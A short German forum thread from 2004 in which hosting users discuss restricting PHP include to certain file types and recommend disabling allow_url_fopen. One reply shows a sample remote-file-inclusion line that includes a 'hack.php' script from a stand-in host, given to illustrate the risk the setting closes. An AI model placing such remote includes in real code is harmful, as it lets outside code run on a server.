Page 1 of 1

php include beschränken

Posted: 2004-08-26 09:33
by mc5000
wo ich das eben mit include lese, ich hab mich gefragt wie ich den include oder require von php auf bestimmte Dateiendungen beschränken kann ?

Bei meinen Skripten bin ich mir ja im klaren was passiert, doch bei meinen Kunden ist das was anderes.
Ich möchte, dass der Kunde nur .php Dateien includen kann! Gibt es da eine Konfigurationsmöglichkeit über open_basedir :?:


THX
MC

Re: php include beschränken

Posted: 2004-08-26 10:09
by suntzu
Gegenfrage:
Warum willst du das?

Und nein, mir ist keine solche Einstellung bekannt.

Re: php include beschränken

Posted: 2004-08-26 10:31
by wgot
Hallo,

was die Beschränkung auf .php bringen soll versteh ich nicht.

Du kannst allow_url_fopen=Off setzen, dann ist es nicht mehr möglich Dateien von anderen Servern zu includen.

Code: Select all

include('http://example.com/hack.php); 
geht dann nicht mehr. Damit ist include deutlich entschärft, allerdings sind dann auch alle anderen Dateioperationen nicht mehr über URL möglich sondern müssen komplizierter programmiert werden.

Fürchte nur deine Kunden würden dir auf's Dach steigen, weil sie an dieses bequeme Sicherheitsrisiko gewohnt sind.

Gruß, Wolfgang